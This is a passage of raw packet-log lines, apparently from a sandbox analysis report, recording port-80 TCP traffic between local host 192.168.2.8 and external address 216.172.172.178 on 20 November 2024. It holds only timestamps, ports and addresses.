                                                                                        Nov 20, 2024 07:53:13.243680954 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.243685961 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.243694067 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.243710041 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.243716955 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.243731976 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.243743896 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.243743896 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.243771076 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.243786097 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.243798018 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.243809938 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.243827105 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.243858099 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.243968010 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.243979931 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.243990898 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.244003057 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.244015932 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.244023085 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.244040012 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.244046926 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.244060040 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.244071960 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.244083881 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.244096041 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.244097948 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.244112015 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.244122028 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.244128942 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.244138002 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.244164944 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.244164944 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.244179010 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.244191885 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.244210958 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.244224072 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.244229078 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.244235992 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.244247913 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.244252920 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.244261026 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.244275093 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.244278908 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.244285107 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.244301081 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.244318962 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.244438887 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.244452000 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.244463921 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.244477034 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.244484901 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.244488955 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.244503975 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.244513988 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.244519949 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.244532108 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.244545937 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.244556904 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.244584084 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.244787931 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.244801044 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.244812965 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.244833946 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.244848967 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.244934082 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.244946957 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.244959116 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.244970083 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.244982004 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.244986057 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.244995117 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.245006084 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.245012999 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.245029926 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.245043039 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.245054960 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.245065928 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.245079041 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.245080948 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.245094061 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.245106936 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.245109081 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.245121002 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.245132923 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.245137930 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.245145082 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.245157003 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.245168924 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.245171070 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.245182991 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.245197058 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.245208979 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.245244980 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.245405912 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.245418072 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.245429993 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.245451927 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.245455027 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.245481014 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.245497942 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.245498896 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.245512009 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.245523930 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.245537043 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.245543003 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.245548964 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.245559931 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.245567083 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.245568037 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.245574951 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.245585918 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.245606899 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.245629072 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.289258003 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.289381027 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.289391041 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.289402962 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.289414883 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.289426088 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.289438009 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.289450884 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.289652109 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.289653063 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.329763889 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.329828024 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.329843044 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.329857111 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.329863071 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.329868078 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.329874992 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.329895973 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.329905987 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.329917908 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.329922915 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.329930067 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.329941988 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.329950094 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.329998016 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.330010891 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.330017090 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.330018044 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.330024004 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.330040932 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.330051899 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.330075979 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.330100060 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.330240965 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.330252886 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.330265999 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.330342054 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.330353975 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.330364943 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.330374956 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.330387115 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.330399036 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.330406904 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.330427885 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.330427885 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.330427885 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.330427885 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.330441952 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.330446959 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.330455065 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.330466032 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.330477953 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.330483913 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.330487013 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.330497026 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.330514908 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.330530882 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.330537081 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.330542088 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.330554008 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.330564022 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.330574989 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.330575943 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.330586910 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.330596924 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.330626965 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.330673933 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.330683947 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.330694914 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.330713034 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.330713034 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.330733061 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.330745935 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.330746889 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.330759048 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.330770969 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.330777884 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.330796003 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.330883026 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.330894947 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.330908060 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.330919027 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.330921888 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.330955029 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.330957890 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.330966949 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.330980062 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.330992937 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.331005096 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.331012011 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.331017971 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.331022978 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.331031084 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.331048965 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.331079006 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.331161976 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.331175089 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.331211090 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.331218004 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.331223011 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.331243038 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.331252098 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.331276894 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.331285954 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.331654072 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.331665039 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.331675053 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.331686020 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.331698895 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.331710100 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.331710100 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.331722975 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.331727028 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.331728935 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.331734896 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.331788063 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.331792116 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.331804037 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.331814051 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.331825018 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.331830978 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.331835032 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.331845999 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.331849098 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.331857920 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.331868887 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.331877947 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.331882000 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.331893921 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.331907034 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.331911087 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.331918001 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.331923008 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.331923008 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.331928968 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.331939936 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.331958055 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.331958055 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.331978083 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.331983089 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.331989050 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.332001925 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.332011938 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.332019091 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.332025051 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.332036018 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.332047939 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.332056999 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.332060099 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.332070112 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.332076073 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.332078934 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.332087994 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.332093000 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.332099915 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.332110882 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.332122087 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.332123041 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.332134962 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.332142115 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.332159996 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.332175016 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.376348972 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.376364946 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.376374960 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.376435041 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.376449108 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.376460075 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.376468897 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.376483917 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.376539946 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.416621923 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.416651011 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.416661024 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.416671991 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.416682959 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.416695118 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.416780949 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.416790009 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.416795015 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.416800022 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.416825056 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.416840076 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.416851997 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.416861057 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.416871071 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.416878939 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.416889906 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.416903973 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.416903973 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.416903973 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.416903973 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.416937113 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.416937113 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.416966915 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.416977882 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.416984081 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.416997910 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.417007923 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.417016983 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.417032003 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.417117119 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.417126894 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.417135954 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.417145967 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.417150974 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.417154074 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.417155981 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.417180061 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.417190075 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.417197943 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.417201042 CET8049707216.172.172.178192.168.2.8
